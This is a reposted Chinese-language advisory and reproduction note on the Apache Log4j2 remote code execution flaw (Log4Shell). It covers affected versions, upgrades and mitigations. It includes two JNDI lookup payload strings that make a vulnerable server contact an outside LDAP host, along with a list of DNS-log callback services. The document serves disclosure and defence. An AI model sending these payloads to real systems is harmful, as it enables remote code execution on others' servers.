标签：rc1 log4j 漏洞 代码执行 Apache 2.15 Log4j

漏洞描述

Apache Log4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。
​

影响版本

2.0-beta9 <= Apache Log4j <= 2.15.0-rc1

不受影响版本

Apahce Log4j 2.15.0-rc2（与官网的2.15.0稳定版相同）
Apache Log4j 2.15.1-rc1
​

PS：
1、 使用Apache Log4j 1.X版本的应用，若开发者对JMS Appender利用不当，可对应用产生潜在的安全影响。
2、 官方在Apache Log4j 2.15.0-rc1版本中已将log4j2.formatMsgNoLookups默认设置为true，在没有更改此默认配置的情况下，Log4j 2.15.0-rc1版本不受该漏洞影响。

漏洞复现

log4j.java代码

log4jRCE.java代码

POC验证

payload:${jndi:ldap://1otakd.ceye.io/exp}

DNSlog平台

ceye.io
dnslog.link
dnslog.cn
dnslog.io
tu4.org
burpcollaborator.net

EXP验证

payload:${jndi:ldap://172.20.10.2:1389/l41iv4}
​

​

漏洞修复

目前官方已发布Apache Log4j 2.15.1-rc1（测试版）及Apache Log4j 2.15.0（稳定版）修复该漏洞，建议受影响用户可将Apache Log4j所有相关应用到以上版本，下载链接：https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.1-rc1或https://logging.apache.org/log4j/2.x/download.html
ps：若用户目前已经升级为Log4j 2.15.0-rc1或Log4j 2.15.0-rc2版本，默认配置下已不受该漏洞影响；请确定相关业务是否需要使用lookup功能，如果需要开启，请考虑升级到Log4j 2.15.1-rc1版本进行解决。
注：防止升级过程出现意外，建议相关用户在备份数据后再进行操作。
​

缓解措施

（1）添加jvm启动参数 -Dlog4j2.formatMsgNoLookups=true
（2）在应用程序的classpath下添加log4j2.component.properties配置文件文件，文件内容：log4j2.formatMsgNoLookups=True
（3）移除log4j-core包中JndiLookup 类文件，并重启服务
具体命令：zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
（4）建议JDK使用11.0.1、8u191、7u201、6u211及以上的高版本
（5）限制受影响应用对外访问互联网
（6）禁用JNDI。如在spring.properties里添加spring.jndi.ignore=true
（7）采用其他防护措施，更新WAF、RASP规则等

标签：rc1,log4j,漏洞,代码执行,Apache,2.15,Log4j
来源： https://blog.csdn.net/weixin_43720495/article/details/121940854

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。